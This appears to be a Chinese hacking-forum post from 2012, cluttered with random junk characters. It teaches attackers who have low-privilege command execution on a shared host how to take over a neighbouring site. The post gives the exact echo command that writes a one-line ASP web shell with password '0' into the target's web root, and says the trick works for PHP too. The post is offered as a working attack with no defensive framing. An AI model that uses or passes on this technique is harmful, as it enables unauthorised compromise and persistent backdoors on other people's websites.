在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
, g9 ]9 e- w- q& C n/ H# ~7 a/ ?) C1 ]5 D8 @( `1 w3 z
命令格式
$ G: q- D/ f2 O" ^ J4 V5 N( @! Q+ T7 D. u5 C: ^$ X
Echo 语句 >目标站绝对目录
. ]' i- H7 G# J& E1 d
: J9 d- M& E4 f$ d例如:
; ~0 W3 `$ p: Z8 C3 o& s3 e% h4 i9 Q* }6 j1 d/ Z" f9 P
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp r0 u! p4 D8 p7 z8 Y+ W8 R
+ X6 d* |& V5 H$ D" Y' x3 H1 T) x这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。: S* a. X8 Q5 l6 @: D0 a
|
发表于 2012-9-23 14:40:24
收藏
支持
反对